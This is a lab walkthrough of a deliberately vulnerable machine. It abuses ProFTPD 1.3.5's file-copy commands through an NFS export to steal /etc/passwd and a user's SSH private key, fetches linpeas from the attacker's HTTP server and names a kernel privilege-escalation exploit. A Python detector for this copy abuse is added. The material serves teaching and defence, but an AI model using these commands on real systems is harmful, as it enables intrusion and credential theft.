Outdated
mkdir nmap
sudo rustscan -a 172.31.1.22 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
FTP on port 21 and NFS on port 2049 are open.
Let's see if there's anything we can mount over NFS.
showmount -e $ip
As you can see, we are allowed to mount /var/nfsbackups.
Let's mount that export.
mkdir /tmp/test_mount
mount -t nfs 172.31.1.22:/var/nfsbackups /tmp/test_mount
Upon mounting, we see three folders, but they appear to be empty.
If we go back to the nmap scan, you will notice that the FTP server is running ProFTPD 1.3.5, and a quick search using searchsploit shows it has a file copy vulnerability.
This means we can chain that exploit with the NFS share we have mounted: any file the FTP server can read can be copied into the exported directory and then read from our mount point. First, let's connect to the FTP server using nc. I'll copy /etc/passwd to the export since we can read it from the mount.
> $nc 172.31.1.22 21
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]
> $site cpfr /etc/passwd
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/passwd
> 250 Copy successful
Looks like we have successfully copied the passwd file, and now we can read it from the mount.
From passwd we can also see that daniel is the non-root user. We can copy daniel's SSH key to the export the same way, and if a private key exists, use it to log in via SSH.
> $nc 172.31.1.22 21
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]
> $site cpfr /home/daniel/.ssh/id_rsa
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/daniel_id_rsa
> 250 Copy successful
Let's try to use daniel's private SSH key to log in.
chmod 600 daniel_id_rsa
ssh -i ./daniel_id_rsa daniel@172.31.1.22
We have successfully logged in as daniel. Sweet :D
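From the defender's side, the chain above leaves a clear trail: a SITE CPFR on a sensitive file followed by a SITE CPTO into an NFS-exported directory. The following is an added example, not part of the original write-up, that runs that detection logic over constructed ProFTPD command-log lines; the log layout (client IP, user, full command) and the export path list are assumptions for the example.

```python
import re

# Constructed sample lines in an assumed "<client-ip> <user> <command>" layout,
# similar to what a ProFTPD ExtendedLog with "%a %u %r" would record.
SAMPLE_LOG = """\
172.31.1.50 anonymous SITE CPFR /etc/passwd
172.31.1.50 anonymous SITE CPTO /var/nfsbackups/passwd
172.31.1.50 anonymous SITE CPFR /home/daniel/.ssh/id_rsa
172.31.1.50 anonymous SITE CPTO /var/nfsbackups/daniel_id_rsa
10.0.0.7 daniel SITE CPFR /home/daniel/report.txt
10.0.0.7 daniel SITE CPTO /home/daniel/report.bak
10.0.0.7 daniel RETR report.bak
"""

# Prefixes an FTP user should never be copying from, and the directories that
# `showmount -e` reported as NFS exports on this host (assumed for the example).
SENSITIVE_PREFIXES = ("/etc/", "/root/")
EXPORTED_DIRS = ("/var/nfsbackups/",)

LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<user>\S+) SITE (?P<cmd>CPFR|CPTO) (?P<path>\S+)$"
)

def find_mod_copy_abuse(log_text):
    """Pair each CPFR with the next CPTO from the same client/user and flag
    copies that read a sensitive path or land inside an NFS export."""
    pending = {}   # (ip, user) -> source path of a CPFR awaiting its CPTO
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a SITE copy command; ignore
        key = (m["ip"], m["user"])
        if m["cmd"] == "CPFR":
            pending[key] = m["path"]
            continue
        src = pending.pop(key, None)
        if src is None:
            continue  # CPTO with no preceding CPFR; the server rejects it anyway
        dst = m["path"]
        reasons = []
        if src.startswith(SENSITIVE_PREFIXES) or "/.ssh/" in src:
            reasons.append("sensitive source")
        if dst.startswith(EXPORTED_DIRS):
            reasons.append("written into NFS export")
        if reasons:
            alerts.append({"client": key[0], "user": key[1],
                           "src": src, "dst": dst, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in find_mod_copy_abuse(SAMPLE_LOG):
        print(a)
```

The benign daniel copy inside his own home produces no alert; only the two anonymous copies into the export are reported.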
First, let's transfer linpeas.sh to the target.
(base) [psdon@arch outdated]$ cd /opt/peass/linPEAS/
(base) [psdon@arch linPEAS]$ ls
builder images linpeas.sh README.md
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
You can find our attacking machine's IP address on the tun0 interface by executing the following.
(base) [psdon@arch outdated]$ ip a | grep tun
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
inet 10.10.0.41/24 scope global tun0
Then transfer the script to the target using wget.
daniel@outdated:~$ wget http://10.10.0.41/linpeas.sh
--2021-09-07 14:38:02-- http://10.10.0.41/linpeas.sh
Connecting to 10.10.0.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 458110 (447K) [application/x-sh]
Saving to: `linpeas.sh'
100%[===========================================================================================================================================================================>] 458,110 335K/s in 1.3s
2021-09-07 14:38:04 (335 KB/s) - `linpeas.sh' saved [458110/458110]
daniel@outdated:~$ chmod +x linpeas.sh
And now we can run linpeas.sh.
daniel@outdated:~$ ./linpeas.sh
linpeas-ng by carlospolop
Right off the bat, you will notice the kernel version is 3.13.0-32-generic.
This kernel version has a known local privilege escalation, and we can compile the exploit on the target since gcc is installed there.
First, mirror the exploit with searchsploit to our local machine, then transfer it to the target machine.
searchsploit -m linux/local/37292.c
mv 37292.c exploit.c
Compile the exploit and enjoy your root privileges :D